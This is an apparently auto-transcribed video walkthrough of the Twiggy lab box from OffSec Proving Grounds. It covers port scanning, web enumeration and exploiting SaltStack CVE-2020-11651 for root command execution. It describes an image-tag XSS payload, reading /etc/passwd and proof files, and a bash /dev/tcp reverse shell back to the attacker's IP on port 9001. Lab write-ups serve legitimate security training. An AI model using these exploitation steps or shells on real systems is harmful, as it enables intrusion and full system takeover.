I'm NoxLumens, and today we're going to be doing things a little bit different. Earlier today, I had a break from work, about an hour, and started working through Twiggy from Proving Grounds. This is the first of our practice labs. So I'm paying for these labs. Right now it's $19 for 1 month. Maybe it's always $19 for 1 month, but you know. Anyway, I'm paying that much. Our IP is going to change from this morning. This is our new IP. And doing a little bit different in that I've not gone through all of this box. I've only gone through a part of it. So the videos that you may have seen, I've either gone through absolutely nothing or, every part of the box. And maybe it was a few days ago, but, I have gone through it. So this one's going to be a little bit different. I'm going to bring you up to speed, show you what I have and what I have done. So I started off with an NMAP scan. And because it's faster, I just scanned the top 5,000 ports. It came back. And that's wrong because the IP has changed. It's now, what was it, 244? 244.62, 168, 244.62. Yeah. Yeah, so this should run. And it's going to end up coming back with 22, 53, 80, 45, 05, 45, 06, 8,000. 5,000 ports is actually not enough to get back the 4505 and 4506. It is enough to get back 22, 53, 80, and 8,000. So once I had my initial ports, once I have these 4 initial ports, what I ended up doing is I then ran my default scripts command in my directory. That's wrong. So I ran NMAP. This will work. There we go. So I ran NMAP, top ports. Nope, that's wrong. It was NMAP, default scripts, enumerate versions, and then the ports, which were 22, 53, 80, and 8,000. So I started off doing this, and then in a side tab, I also had NMAP running -p dash 192.168.244.62. Right, so while I'm starting to enumerate these ports, ignore that. I'm starting to enumerate these ports, 22, 53, 80, and 8,000. I have a full scan running in the background, so I don't have to wait, like a huge amount of time before I start working. I can just start working. Right off the bat, we can see 22 comes back. We get DLNet Labs, NSD, and this kind of sparked me. I like to start top to bottom, lowest port to highest port. And that kind of made me think that maybe I could do like a reverse lookup. Let me split these windows up. Come on, son. Split up. Why is it doing that? There we go. I must have hit F11 at some point. Anyway. Let's stop this and clear this out. So I started off thinking maybe I could do some reverse lookups. Maybe I could come back and get something. 24462. Cool. So we start off doing dig-x at the IP address and then the IP address. Ultimately, it came back with nothing. I tried to do stuff like I want all records, search for all records, search for any record. Got any, see the cookie. Really, I didn't see a whole lot in there. And then we can do, other things. We can search for A records. We search for quad A records. So IPv4, IPv6. This is our IPv4 address. Search for NS records. server records, text records, you know, all those things. Ultimately, DNS came back with nothing. And that's when I moved on into port 80. So along with that comes with things like Gobuster, Feroxbuster, directory, brute forcing, essentially. Well, definitely directory brute forcing. So we can do 244.62. And as we come through, if you look at all this, this is not great. Description exactly, but we can see 301s, a lot of 301s, 403s, few 200s, static, mezzanine, and you come back and you learn that mezzanine, if you actually go and navigate to the page, mezzanine is a CMS, so powered by Mezzanine and Django and Bootstrap. So this does have it has like a cross-site scripting, has cross-site scripting vulnerability in it, and it's in the comment section. So if the blog here was enabled in the comment field, we can make a comment that or like, I don't know, we could do something like this. It was like you had to close out the script tag. I don't know why I recall it looking like that, but like single quote, double quote, whatever. And then they used an image tag. So image source X on error equals whatever. We can do prompt image. So anyway, they did some like XSS. It's vulnerable to XSS. Anyway, so we can see if we navigate to blogs, RSS, and Atom, we can pull those out. And we see port 8000 blog, port 8000 blog feeds Atom. And we know this is 80 blog. And that's actually what this is. So blogs feeds Atom is that same file. It's this file. And then let's close all this out. Look back at our notes. So ultimately, I stopped searching on 80 and started moving on, where I started looking up 0MQT or MQZTP 45 and 46, which we can do. Just typing exploit after. Yes, and if we search for that, we get this salt stack 2001 RCE. I don't know why this pops up. Like, what that specifically? Oh, I guess it's there, 0MQ. So it is in here. And we can take this and look around. We can just run it, see what happens. So I did run this initially. CD documents, proving grounds, Twiggy clear. What do I have in here? Nothing? Okay. Make dir dub c into dub, and then we will nano exploit.py xy enter python 3 exploit.py, and we have to add the salt. So pip 3 install salt. CherryPy. Oh yeah. So speaking of CherryPy, I found CherryPy error message somewhere. Okay, yeah. Okay. So on port 8000, it does say if you could hit like one of the 404 pages or 401 pages, I think it's 404, but you get powered by CherryPy 5.6.0, and then if you go and you look that up, you can get you see that there are actually more versions. Vulnerable. Checking salt master. So we need to check this. And this is actually where I've gotten to. So we have this tool And initially I got rid of this tool because it didn't seem useful, right? But if you go to port 8000, if you go to port 8000, this is not going to resolve. 244. Come on, bro. 244, 62, 8000. Yeah, so we get this. Two things that we can do. We can inspect it and look at the network tab. I need to reload. And we're going to actually look at the document and then see what it's sending. Where we can see X upstream salt API 3000. Now that kind of falls in line with what we were seeing with the 0MQ. We get salt stack 3000.1. So that kind of makes us think that maybe we should look, more into this. Additionally, I ended up finding that. So yeah. Here we go. So we just curled with, the verbose flag set, and we can actually see the header come back, right? X denotes like a custom header field. So X upstream salt API 3001. And then we see some JSON data. So other things that I saw with Cherry, was it CherryPy? Yeah, CherryPy are you could do like path traversal with // whatever. Yeah, I tried that out, and that did not seem to work for me. Also, we could have done %2e, which I believe ends up being the periods. So that's kind of where we're at. We're at me thinking that this exploit program is our next way in. And you can kind of see, I took more notes, I grabbed some more notes, coded them in Python. You can see what I've Googled. I actually just pulled the whole thing out, and then I just put exploit at the end. Ended up coming across this exploit, which is that one of these. I'm going to close all these out. Yeah. So we ended up coming across this. And it goes into detail about the exploit, and actually this exploit code, this POC that we have, that we ended up getting, it may be the exact same exploit, but we found it a different way. So we can do this. We can test to see if this works. I'm not sure if it will. So let's find out. I think they were saying, let's do -h python3 exploit.py --master http://192.168.24. Hello, F11. 24462, and then we do need to add a port because it's non-standard, and is it 8000? Maybe 8000. Went up seeing what happens. So I get this, yeah. Unclosed transport. I believe that's what I got last time as well. And maybe it might be because I'm not sending it to the right port or something. I don't know. We can try one of these 4505s. I feel like it's just going to keep failing. I need to read through this to see what's actually happening. TCP salt global exception handler. I wonder if putting HTTP in there is causing some sort of problem. We try several ways just to see what ends up happening. Ooh. Please use salt channel client instead. We might have to end up updating the script. This module is deprecated. Let's try to send it to 8,000 real fast. See what happens. Status is offline. Status offline. Which we know is not the case. We can actually navigate to it. But we can also just ping it real fast. Yeah. Master. Checking if vulnerable to the CVE. Yeah. Run a test command or run ping capture the TCP dump. So we didn't end up getting anything back, and maybe that has something to do. I don't know if I'm using the same POC as them. So I'm just going to take. Yeah, I'm going to take theirs directly. Let's look at the raw code. Copy paste. Nano exploit. Actually, let's remove exploit. Hi. And then we will nano XY and enter clear. And then let's try this again. With, following that instead. We're still getting offline. It's 5404, 5405, 4505. Please use one of the scripts to verify correctly patched systems. You have access to this, blah, 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 blah. This module is deprecated. Please use salt channel. Do we need the port? Is there a problem here? Enable trace malloc to get the object allocation trace back. Check if vulnerable to, and it is. So it runs it, it starts to run it, and then it throws an error. Unclosed transport. All right, so we know that it works. Let's try, was it exec? Let's go back and follow along with this. Exploit, master. Okay, we'll just follow along and ping ourselves. Okay. So we're putting in double quotes, count for. I wonder if this is necessary since this is not. Let's ping ourselves real fast. Let's ping something. Ping H. Where's the count flag or number of times? Fine. Is it C? Is it N? It may be lowercase n on. It's not. I sure thought it was. Connect count. Okay, so it is C. All right, whatever. Whatever. C 192.168.45.242. And we need to do a count of whatever. We'll just do 2. Edit double quotes. We're going to do single quotes and hope that it works. No luck. Oh, no. It did come back to us. Nice. Now I can run commands. Okay. So excellent. We know that this works. We know that we have a way to test it. And we're going to note all this down. Okay. So exploitation of CVE what? ping self, start TCP dump, ping self, sh. There we go. And what else do we need to add in here? Oh, the CVE number, right? Yes, I would like to add the CVE number. And it's up here further. Just to note that we found that it was... Actually, we should take this entire thing. CVE 2020 11651 POC. The POC is not necessary. That's not a part of the CVE. Okay. Gonna make this slice to look at. There we go. So we know that this returned. Yikes. Which is excellent. We can get rid of this bottom window. And then we should be able to granted netcat is on here. We can just do a reverse shell. We can do Python. Let's just go to rev shells. Rev shell generator. It's revshells.com. We're going to do 192.168.45.242, port 9001. We can do netcat. We want to do netcat. Is that what we want? Yeah, whatever. Okay, yeah, we'll try this. We'll try it. Hope that it works. The bottom window froze. Netcat NLVP 9001. We'll see if that comes back with anything. Oh, remember, it took a minute during the last time. Successfully scheduled job. Needed to execute netcat C shell. And yeah, that's our IP. 9001. That's us. Let's just do bash dash I. Ish. Dash I. Give this a try. Basically, we're just trying to find something that works now. In order to give us a reverse shell, I wonder if I should try something else. I don't think that it should really matter. Python shortest. Oof. This one's kind of messy because we're having to put it in quotes and it has quotes in it. I don't like this as a command. Take another look. Quotes, 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 more quotes, subquotes. Yeah, double quote, subquote, subquote. Try this method. 45, 242, 9001. It's kind of a shame that this error is occurring. Unclosed transport. It very well could be messing something up in the problem, and that's the problem. Totally vulnerable. Root key obtained. Nothing. Root key obtained. Okay, so this is taking a long time. So maybe that's not it either. It's gotta be a good way to do this. 192.168.244. Oh, actually, I think this has other methods. -- read etc passivity. Go to users. This hopefully this will read the directory. And it did. Okay. Screw this. Maybe we can get in through SSH if we can get this the keys. So we'll have root. Root. In halt. Yeah, only root has dash. Server, no logon. So then that's who we are. Does that mean that we can just read root proof.txt? Ah, man, and we can. Okay. So we are running as root. So we can run any command as root. But I don't like that I can't get a reverse shell or that I'm not able to. So let's do some more looking. SSH. Yeah, let's see if this will give us the directory, the contents of the directory. Read root SSH ID _ RSA. Authorized keys. Nothing there either. I think that there's another way to look inside of directories. Do -h. Exec all. Run a command on all minions. Read file. Run checks, debug force port master. Upload source. I guess we could upload some keys. Upload source, upload destination. Okay. SSH keygen. Twiggy. Let's do Twiggy here though. Twiggy. No passphrase. ls. Twiggy.pub and Twiggy. Okay. So we can do, what was it? -- upload source, which would be Twiggy.pub. Upload, was it destination? How do they do it? DEST. To root SSH authorized keys. I do not know if this is going to work, but I guess we're going to find out. SSH root at 192.168.244 62 -I. What did I call it? I just call it Twiggy. Yes. Nope. So this should show us our own key if it uploaded. Attempting to read it. How did I upload it? authorize underscore keys SSH. So it may not have that, which if that's the case, we can do exec. Exec, make dir root SSH. And then we can see this uploads. I'm not sure if it's actually sending or not. Which is not great. Let's read. Actually, if this uploaded, we should have seen it. And it didn't. So maybe this isn't uploading. Maybe I need to do the whole path like that. Would that work? If I don't do the whole path, if I just do that amount? Still nothing. Twiggy.pub. Twiggy. Oh man. I wonder if that's why it couldn't do it the whole time. Or why it wasn't. Authorized keys. Still not getting anything, which makes me think that it's still not doing it. LS, it is Twiggy. Twiggy.pub, upload source. Upload destination route says authorized keys. I wonder if I can say what path to upload it to, but not define, like not name it. Destination path must be relative. All right, let's try this again. We can try exec. Netcat, NLVP. Oh, I totally understand if you intend to cut out. Since we were able to find the proofs of text and all that good stuff. But love to see you stay. See what this says, if it gives us an error message. Successfully scheduled job. I don't know if Netcat is installed. /i. You could have like any bin shell. Bin shell? In bash? sh. Let's schedule all the jobs. One of these has to work. Dash. You can try sh. You can try CSH. You can try ash. -I. Yeah. Show corn shell dash bash. Let's look at what they ended up using. I'm sure that they got a shell. Yeah, bash RSI. They have TCP ports. Output. Bash-I 2 dev TCP 192.168.45.242 port 9001. We do something, I don't know, 80. Not that that should make any difference, but it might. Oh. Oh. And that worked. Okay, cool. I love that. That's awesome. Catproof.txt. I wonder why they... I swear I ran this. I. Maybe it was the 9001. I got it. I don't know. For some reason, you know? Well, anyway, that was Twiggy. I was about to say from Hack the Box, but it's not. It's from OffSec's Proving Ground Practice Lab. And hopefully you enjoyed it. It was kind of fun. It was fun going through this section. I do wish that there was a, you know, like, I don't know, a low-level user that you had to get and then, you know, escalate your privileges that way. But I'm totally cool with this as well. This is just as valid as anything else. You know, root is root, root is root is root. And we are root. So anyway, if you had a good time, let me know. Let me know. Leave a comment. Let me know. Hit the like button, subscribe, all that dumb stuff. But, yeah, doesn't really matter. Anyway, if you like it, see you in the next one. Have a good day.